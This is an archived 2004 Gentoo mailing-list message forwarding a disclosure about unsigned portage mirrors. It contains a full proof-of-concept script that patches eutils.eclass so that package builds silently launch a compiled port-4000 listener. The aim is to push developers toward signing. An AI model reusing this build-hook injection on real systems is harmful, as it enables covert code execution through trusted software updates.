[gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2] - gentoo-dev

From:	Joshua Brindle <method@g.o>
To:	gentoo-dev@l.g.o, gentoo-core@××××××××××××.org
Subject:	[gentoo-dev] [Fwd: [gentoo-security] Trojan for Gentoo, part 2]
Date:	Sat, 06 Nov 2004 20:56:32
Message-Id:	`418D3A80.8020504@gentoo.org`

1

perhaps some motivation for portage devs....

2

3

4

5

-------- Original Message --------

6

Subject: 	[gentoo-security] Trojan for Gentoo, part 2

7

Date: 	Sat, 06 Nov 2004 21:16:11 +0100

8

From: 	Alexander Holler <holler@××××××××××.de>

9

To: 	gentoo-security@l.g.o

Hi,

14

15

after 1.5 years (2 years after the bug could could found in bugzilla) it 

16

seems that one of the highest security risks is closed. At least I've 

17

seen something about signed ebuilds. (see 

18

http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).

19

20

Time for the next part. I've already written a bug for that a year ago, 

21

but it was now closed a second time by "the ... gatekeeper".

22

23

See bug #26110

24

25

Here's the next small script. If you are operating a gentoo mirror, or 

26

having access to one, feel free to play with it.

27

28

If you are a user, the only practical way to ensure a minimum of 

29

security is to sync twice:

30

 (a) sync,

31

 (b) delete timestap,

32

 (c) sync with other mirror and

33

 (d) look if no files where different, otherwise restart with (a)

34

35

----------------gentooTrojan.sh---------------------------

36

#!/bin/sh

37

if [ ${#} -ne 1 ] ; then

38

  echo "This script puts a silly trojan into Gentoo's portage."

39

  echo "Usage: `basename ${0}` PathToPortage"

40

  exit 1

41

fi

42

43

mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass

44

sed -e 's:^epatch().*{:epatch()  {\newarn "Starting Trojan.\nTry it with 

45

telnet localhost 4000.\nKill it with killall 

46

GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' 

47

<${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass

48

cat >${1}/eclass/GentooTrojan.c << EOF

49

#include <unistd.h>

50

#include <sys/socket.h>

51

#include <netinet/in.h>

52

#include <string.h>

53

54

int main(void)

55

{

56

        struct  sockaddr_in     serv;

57

        struct  sockaddr_in     cli;

58

        int     sock;

59

        sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

60

        if (sock < 0)

61

                return 1;

62

        bzero((char *) &serv, sizeof(serv));

63

        serv.sin_family = AF_INET;

64

        serv.sin_addr.s_addr = htonl(INADDR_ANY);

65

        serv.sin_port = htons(4000);

66

        if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)

67

                return 1;

68

        if (listen(sock, 5) < 0)

69

                return 1;

70

        while (1) {

71

                int     scli;

72

                int     slen;

73

    static char *str="Your are listing to the famous Gentoo trojan!\n";

74

                slen = sizeof(cli);

75

                scli = accept(sock, (struct sockaddr *) &cli, 

76

(socklen_t *) &slen);

77

    write(scli, str, strlen(str));

78

    close(scli);

79

}

80

}

81

EOF

82

83

gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c

84

85

echo "Done. Portage successful infected with a trojan."

86

echo "Just emerge an ebuild which uses epatch and do a"

87

echo "  telnet localhost 4000"

88

echo "afterwards."

89

-------------------------------------------

90

91

Kind regards,

92

93

Alexander Holler

94

95

96

PS: Please don't reply to me, I don't read any Gentoo mailing lists 

97

anymore, in fact I even don't know why I'm writting this message, as I 

98

already have lost every interest in Gentoo some time ago.

99

100

PPS: Sorry for that hard words, but that all reminds me on Microsoft. 

101

The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting 

102

forgotten, ignored or fixed in the same time.

103

104

PPPS: I really appreciate all the very good work on hardened gcc, 

105

selinux-profiles and so on, but for me, this all seems useless as long 

106

as the base is compromised that easy and the user has no practical way 

107

(e.g. hashs) to check what he gets on his machine with a 'sync'.

108

109

--

110

gentoo-security@g.o mailing list

--

116

gentoo-dev@g.o mailing list

Gentoo Archives: gentoo-dev

Replies

1	perhaps some motivation for portage devs....
2
3
4
5	-------- Original Message --------
6	Subject: [gentoo-security] Trojan for Gentoo, part 2
7	Date: Sat, 06 Nov 2004 21:16:11 +0100
8	From: Alexander Holler <holler@××××××××××.de>
9	To: gentoo-security@l.g.o
10
11
12
13	Hi,
14
15	after 1.5 years (2 years after the bug could could found in bugzilla) it
16	seems that one of the highest security risks is closed. At least I've
17	seen something about signed ebuilds. (see
18	http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).
19
20	Time for the next part. I've already written a bug for that a year ago,
21	but it was now closed a second time by "the ... gatekeeper".
22
23	See bug #26110
24
25	Here's the next small script. If you are operating a gentoo mirror, or
26	having access to one, feel free to play with it.
27
28	If you are a user, the only practical way to ensure a minimum of
29	security is to sync twice:
30	(a) sync,
31	(b) delete timestap,
32	(c) sync with other mirror and
33	(d) look if no files where different, otherwise restart with (a)
34
35	----------------gentooTrojan.sh---------------------------
36	#!/bin/sh
37	if [ ${#} -ne 1 ] ; then
38	echo "This script puts a silly trojan into Gentoo's portage."
39	echo "Usage: `basename ${0}` PathToPortage"
40	exit 1
41	fi
42
43	mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
44	sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with
45	telnet localhost 4000.\nKill it with killall
46	GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:'
47	<${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
48	cat >${1}/eclass/GentooTrojan.c << EOF
49	#include <unistd.h>
50	#include <sys/socket.h>
51	#include <netinet/in.h>
52	#include <string.h>
53
54	int main(void)
55	{
56	struct sockaddr_in serv;
57	struct sockaddr_in cli;
58	int sock;
59	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
60	if (sock < 0)
61	return 1;
62	bzero((char *) &serv, sizeof(serv));
63	serv.sin_family = AF_INET;
64	serv.sin_addr.s_addr = htonl(INADDR_ANY);
65	serv.sin_port = htons(4000);
66	if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
67	return 1;
68	if (listen(sock, 5) < 0)
69	return 1;
70	while (1) {
71	int scli;
72	int slen;
73	static char *str="Your are listing to the famous Gentoo trojan!\n";
74	slen = sizeof(cli);
75	scli = accept(sock, (struct sockaddr *) &cli,
76	(socklen_t *) &slen);
77	write(scli, str, strlen(str));
78	close(scli);
79	}
80	}
81	EOF
82
83	gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c
84
85	echo "Done. Portage successful infected with a trojan."
86	echo "Just emerge an ebuild which uses epatch and do a"
87	echo " telnet localhost 4000"
88	echo "afterwards."
89	-------------------------------------------
90
91	Kind regards,
92
93	Alexander Holler
94
95
96	PS: Please don't reply to me, I don't read any Gentoo mailing lists
97	anymore, in fact I even don't know why I'm writting this message, as I
98	already have lost every interest in Gentoo some time ago.
99
100	PPS: Sorry for that hard words, but that all reminds me on Microsoft.
101	The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
102	forgotten, ignored or fixed in the same time.
103
104	PPPS: I really appreciate all the very good work on hardened gcc,
105	selinux-profiles and so on, but for me, this all seems useless as long
106	as the base is compromised that easy and the user has no practical way
107	(e.g. hashs) to check what he gets on his machine with a 'sync'.
108
109	--
110	gentoo-security@g.o mailing list
111
112
113
114
115	--
116	gentoo-dev@g.o mailing list